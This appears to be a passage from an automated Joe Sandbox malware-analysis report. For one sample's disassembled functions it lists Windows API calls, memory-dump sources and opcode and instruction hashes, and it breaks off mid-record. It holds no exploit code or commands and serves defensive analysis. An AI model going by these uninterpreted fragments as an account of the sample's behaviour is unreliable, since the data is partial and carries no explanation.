                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F3B2EB
                                                                  • __swprintf.LIBCMT ref: 00F3B304
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F60980), ref: 00F3B342
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  • Opcode ID: 61a79a04502a672f6f5a04c0c342441399279eca5bb5d4f1eeccb43f18cc035d
                                                                  • Instruction ID: cdb9fcb5bf03f9b9c5adaa1df68bea4a773d371bebcd097a2bdb09ac283a2861
                                                                  • Opcode Fuzzy Hash: 61a79a04502a672f6f5a04c0c342441399279eca5bb5d4f1eeccb43f18cc035d
                                                                  • Instruction Fuzzy Hash: EB216070A00108AFCB10EF65CC45DAEB7B8EF89714F104469F909E7392DB71EA45DB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                    • Part of subcall function 00F2AA52: SendMessageTimeoutW.USER32 ref: 00F2AA6F
                                                                    • Part of subcall function 00F2AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2AA82
                                                                    • Part of subcall function 00F2AA52: GetCurrentThreadId.KERNEL32 ref: 00F2AA89
                                                                    • Part of subcall function 00F2AA52: AttachThreadInput.USER32(00000000), ref: 00F2AA90
                                                                  • GetFocus.USER32(00F60980), ref: 00F2AC2A
                                                                    • Part of subcall function 00F2AA9B: GetParent.USER32(?), ref: 00F2AAA9
                                                                  • GetClassNameW.USER32 ref: 00F2AC73
                                                                  • EnumChildWindows.USER32 ref: 00F2AC9B
                                                                  • __swprintf.LIBCMT ref: 00F2ACB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                  • String ID: %s%d
                                                                  • API String ID: 1941087503-1110647743
                                                                  • Opcode ID: 482243c80b4e4dd9a5f94119523e1e08d4f991c54b3aeeada8034f49ebf749fb
                                                                  • Instruction ID: 828a5968b7ba265ef7bd4a26602dc0d44f3575bb18fb877946ffb44af66f23c5
                                                                  • Opcode Fuzzy Hash: 482243c80b4e4dd9a5f94119523e1e08d4f991c54b3aeeada8034f49ebf749fb
                                                                  • Instruction Fuzzy Hash: BB113670600218ABCF01BFA0ED85FEA33ACEF44310F0040B5FE18AA142CA749844EB72
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F32318
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                  • API String ID: 3964851224-769500911
                                                                  • Opcode ID: 19390637572b49dc36f1b1d872023ec78170a0f65c7f06667524049fe25224e2
                                                                  • Instruction ID: a7a2df3d8cae21cfb10d5c7a422c66ed39c9448f94e2bcd8838c915acf94b337
                                                                  • Opcode Fuzzy Hash: 19390637572b49dc36f1b1d872023ec78170a0f65c7f06667524049fe25224e2
                                                                  • Instruction Fuzzy Hash: CF117C3094011C9BDF00EF94D8904FEB3B4FF15314F2044A8D814A7263EB325D0ADB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F4F2F0
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F4F320
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F4F453
                                                                  • CloseHandle.KERNEL32(?), ref: 00F4F4D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  • Opcode ID: ef0a065431b11349eeea8dea9f9ace3ee4f1b353dab32a4306a58aa15e56cc9e
                                                                  • Instruction ID: d236f53cb5f14163719c84d33995cf766b94a2cbd14afe5d41a3809679dbdca0
                                                                  • Opcode Fuzzy Hash: ef0a065431b11349eeea8dea9f9ace3ee4f1b353dab32a4306a58aa15e56cc9e
                                                                  • Instruction Fuzzy Hash: E98171B16007009FD720EF24D846F2AB7E5EF58720F14891EF959AB3D2DBB1AC458B51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F5075D
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5079C
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F507E3
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00F5080F
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F5081C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                  • String ID:
                                                                  • API String ID: 3440857362-0
                                                                  • Opcode ID: a064ccab7ab95a877bca7e5737f5bb509a680cf430e1edd8e4b4b87022a9cc08
                                                                  • Instruction ID: 6e80e0d20912be5f13cd80d746588376f469b9a946a9f7f482978d275eaa2f8f
                                                                  • Opcode Fuzzy Hash: a064ccab7ab95a877bca7e5737f5bb509a680cf430e1edd8e4b4b87022a9cc08
                                                                  • Instruction Fuzzy Hash: 56517B71208208AFC704EF64CC81F6AB7E9FF88315F10491DFA95972A1DB30E909DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32 ref: 00F3EC62
                                                                  • GetPrivateProfileSectionW.KERNEL32 ref: 00F3EC8B
                                                                  • WritePrivateProfileSectionW.KERNEL32 ref: 00F3ECCA
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F3ECEF
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F3ECF7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  • Opcode ID: 46dc568a788bb2be28d39781f61aadbe41a2484535def8e3f30114ca35cb5a09
                                                                  • Instruction ID: fb0ab363c52f37429badb6fba73a64806c965696ba7649155c466d9136f732d5
                                                                  • Opcode Fuzzy Hash: 46dc568a788bb2be28d39781f61aadbe41a2484535def8e3f30114ca35cb5a09
                                                                  • Instruction Fuzzy Hash: CC512975A00519DFCB01EF65C985EAEBBF5EF08314B148099E909AB3A2CB31ED51DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e4a1a7bec9ea7b2230d9f9f145422484ad8f943345e538b6fdce676309e8f164
                                                                  • Instruction ID: cbcf0e203c621cb7c8b170c8a174b28c60c59df3ccc06841f4352fc76f30fe7a
                                                                  • Opcode Fuzzy Hash: e4a1a7bec9ea7b2230d9f9f145422484ad8f943345e538b6fdce676309e8f164
                                                                  • Instruction Fuzzy Hash: 6B41D435D00208AFD710DB24DC44FAABBB4EB0D362F140365EE26A72D1D7709E65FA61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCursorPos.USER32(?,?,00F977B0,?,00F977B0,00F977B0,?,00F5C5FF,00000000,00000001,?,?,?,00F0BD40,?,?), ref: 00ED2727
                                                                  • ScreenToClient.USER32 ref: 00ED2744
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00ED2769
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00ED2777
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  • Opcode ID: 6b9359866fd39e7a47bb20704b14419d50bd6f81ccd16930835357862cf39966
                                                                  • Instruction ID: a5ff5203ed68a3b1d042ea56a5bf6dd425ef286a88d1ff101d9b614a2557935b
                                                                  • Opcode Fuzzy Hash: 6b9359866fd39e7a47bb20704b14419d50bd6f81ccd16930835357862cf39966
                                                                  • Instruction Fuzzy Hash: B9418135904109FFDF259F68C844AE9BB74FB15324F20831BF929A62D0CB31AD94EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                  • String ID:
                                                                  • API String ID: 1795658109-0
                                                                  • Opcode ID: a6307c70158f30e3479e08650735f2d44cd26f5f48fd799638234c433d59aa43
                                                                  • Instruction ID: 26982eb6c77e93ad0a993eb27e83009719f275c8b222636fa831a920f15ed026
                                                                  • Opcode Fuzzy Hash: a6307c70158f30e3479e08650735f2d44cd26f5f48fd799638234c433d59aa43
                                                                  • Instruction Fuzzy Hash: 83312A3191870A9BEB309BA8DC44FFA77E8DB01344F24505BE422A72E4D7B5984AF711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowRect.USER32 ref: 00F295E8
                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00F29692
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F2969A
                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00F296A8
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F296B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: 11baf24f7893b044f4ebb6dc264ce3a0166c511760b040a3a699de698963fade
                                                                  • Instruction ID: 1868563bc55415d2d577c0c2e8c659d95218c8714feac086dec10fb5dadeb206
                                                                  • Opcode Fuzzy Hash: 11baf24f7893b044f4ebb6dc264ce3a0166c511760b040a3a699de698963fade
                                                                  • Instruction Fuzzy Hash: D931BC71904229EFDB14CF68E94CA9E3FB5FB45325F104229F924AB2D1C7B09924EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00F2BD9D
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F2BDBA
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F2BDF2
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F2BE18
                                                                  • _wcsstr.LIBCMT ref: 00F2BE22
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3902887630-0
                                                                  • Opcode ID: ba5922c1fb7cdab86d01d988300838376010256648a4d0fb7fdf6ca01527de7a
                                                                  • Instruction ID: 8c3f0ef375333b36a7cea914bade8fc16fcefa7400c7da0115c6618a43f6475e
                                                                  • Opcode Fuzzy Hash: ba5922c1fb7cdab86d01d988300838376010256648a4d0fb7fdf6ca01527de7a
                                                                  • Instruction Fuzzy Hash: 76213832604618BBEB255B35EC09FBB7BECDF44760F114069FE09DA191EFA1DC40A2A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F5B804
                                                                  • SetWindowLongW.USER32 ref: 00F5B829
                                                                  • SetWindowLongW.USER32 ref: 00F5B841
                                                                  • GetSystemMetrics.USER32 ref: 00F5B86A
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F4155C,00000000), ref: 00F5B888
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 2294984445-0
                                                                  • Opcode ID: c7de9da1f8f47b0da531fc3545d14b5e314430e9f0befdef511e5b81e5afa9b7
                                                                  • Instruction ID: 4720899665db011a1f9bc8041e0dc044f27648dc77fe7a1659077b531f8594cd
                                                                  • Opcode Fuzzy Hash: c7de9da1f8f47b0da531fc3545d14b5e314430e9f0befdef511e5b81e5afa9b7
                                                                  • Instruction Fuzzy Hash: 11218031914619AFCB209F389C08B6A3BA8EB05736F244729FE22D21E0D7709815EB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F29ED8
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29F0A
                                                                  • __itow.LIBCMT ref: 00F29F22
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29F4A
                                                                  • __itow.LIBCMT ref: 00F29F5B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow$_memmove
                                                                  • String ID:
                                                                  • API String ID: 2983881199-0
                                                                  • Opcode ID: 2e03d0c601a49c54271178422bec1993295f846bcfb6015a9ba4753972d8c4cc
                                                                  • Instruction ID: c4a20f61fc8c0e60620d5ba7285a659a150fc8a5aa76f645cebb8c758ae645ec
                                                                  • Opcode Fuzzy Hash: 2e03d0c601a49c54271178422bec1993295f846bcfb6015a9ba4753972d8c4cc
                                                                  • Instruction Fuzzy Hash: 95210A31B04258BBDB509A65DD89EEF7BA9EF85720F144025F900EB241DAF1C941B7E2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: 3eec03dd47c03961c6aaa59eb51903962c31868c85e5905642a6db25c0e70a16
                                                                  • Instruction ID: 7abb8a94b35f866dffa0dadb6343c42d6672c80b3bd017b26055967078a3742d
                                                                  • Opcode Fuzzy Hash: 3eec03dd47c03961c6aaa59eb51903962c31868c85e5905642a6db25c0e70a16
                                                                  • Instruction Fuzzy Hash: C621D475A002049FD700EF64CD84A5ABBF5EF88351F108469F81AD7362CE71AC01DB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED1729
                                                                  • SelectObject.GDI32(?,00000000), ref: 00ED1738
                                                                  • BeginPath.GDI32(?), ref: 00ED174F
                                                                  • SelectObject.GDI32(?,00000000), ref: 00ED1778
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                  • String ID:
                                                                  • API String ID: 3225163088-0
                                                                  • Opcode ID: fbec91c6c54ff023440a84affe5413a2233c0586b6bd0364fd0c216d759f6955
                                                                  • Instruction ID: beba4e87076662d0c9b14eea68b1e97a258abc83d8d8917dc0852c262d367638
                                                                  • Opcode Fuzzy Hash: fbec91c6c54ff023440a84affe5413a2233c0586b6bd0364fd0c216d759f6955
                                                                  • Instruction Fuzzy Hash: 7C21533091430CFFDB11AF64DD487AE7BA9FB01325F244257F825A62B0D7B19992EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: c9bab3b7839d3fffa8158b537ffef6dc77ee7464e7ef4c6559384733a32d6eb0
                                                                  • Instruction ID: fd3b19e2d62da27fcd606172cf524463a46756c6ee1ab8fca99f8f5d1e4f7dd5
